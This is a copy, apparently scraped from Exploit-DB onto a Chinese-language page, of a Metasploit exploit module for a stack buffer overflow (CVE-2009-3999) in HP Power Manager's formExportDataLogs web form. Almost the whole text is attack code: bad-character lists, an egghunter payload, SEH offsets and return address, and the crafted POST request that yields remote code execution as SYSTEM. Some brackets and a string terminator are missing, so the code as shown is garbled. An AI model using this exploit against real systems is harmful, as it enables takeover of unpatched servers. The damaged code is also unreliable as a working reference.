HP Power Manager – ‘formExportDataLogs’ Remote Buffer Overflow (Metasploit)

Exploit Database
136 阅读

作者： Metasploit

日期： 2011-10-20
类别：
- remote
平台：
- cgi
来源：https://www.exploit-db.com/exploits/18015/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

# $Id: hp_power_manager_filename.rb 14016 2011-10-20 17:40:21Z sinn3r $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::Egghunter

def initialize(info = {})

super(update_info(info,

'Name'=> "HP Power Manager 'formExportDataLogs' Buffer Overflow",

'Description' => %q{

This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.

By creating a malformed request specifically for the fileName parameter, a stack-based

buffer overflow occurs due to a long error message (which contains the fileName),

which may result aribitrary remote code execution under the context of 'SYSTEM'.

'License' => MSF_LICENSE,

'Author'=>

[

# Original discovery (Secunia Research)

'Alin Rad Pop',

# Metasploit module (thx DcLabs members, corelanc0d3r, humble-desser, pyoor)

'Rodrigo Escobar <ipax[at]dclabs.com.br>',

# Metasploit fu

'sinn3r'

'Version' => '$Revision: 14016 $',

'References'=>

[

[ 'CVE', '2009-3999' ],

[ 'BID', '37867' ]

'DefaultOptions' =>

{

'ExitFunction' => 'thread',

'Platform'=> 'win',

'Payload' =>

{

'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",

'DisableNops' => true,

'EncoderOptions' => {'BufferRegister' => 'EDI' }# Egghunter jmp edi

'Targets' =>

[

# Tested on HP Power Manager 4.2 (Build 7 and 9)

'Windows XP SP3 / Win Server 2003 SP0',

{

'Ret'=> 0x004174d5,#pop esi # pop ebx # ret 10 (DevManBE.exe)

'Offset' => 721

}

]

'Privileged'=> false,

'DisclosureDate'=> 'Oct 19 2011',

'DefaultTarget' => 0))

register_options([Opt::RPORT(80)], self.class)

end

def exploit

print_status("Generating payload...")

# Randomize the tag by not specifying one

eggoptions = { :checksum => true }

hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

buffer= rand_text_alpha_upper(target['Offset'] - hunter.length)

buffer << make_nops(30) + hunter

buffer << "\xeb\xc2\x90\x90" #JMP SHORT 0xC2

buffer << [target.ret].pack('V*')[0,3] #SEH (strip the null byte, HP PM will pad it for us)

# Let's make the request a little bit more realistic looking

time = Time.new

print_status("Trying target #{target.name}...")

connect

request = send_request_cgi({

'method'=> 'POST',

'uri' => '/goform/formExportDataLogs',

'vars_post' => {

'dataFormat' => 'comma',

'exportto' => 'file',

'fileName' => buffer,

'bMonth' => "%02d" %time.month,

'bDay' => "%02d" %time.day,

'bYear'=> time.year.to_s,

'eMonth' => "%02d" %time.month,

'eDay' => "%02d" %time.day,

'eYear'=> time.year.to_s,

'LogType'=> 'Application',

'actionType' => '1%3B'

'headers' =>

{

'Accept'=> egg,

'Referer' => "http://#{rhost}/Contents/exportLogs.asp?logType=Application"

}

}, 5)

print_status("Payload sent! Go grab a coffee, the CPU is gonna work hard for you! :)")

# Wait for a bit longer. For some reason it may take some time for the process to start

# handling our request.

select(nil, nil, nil, 7)

handler

disconnect

end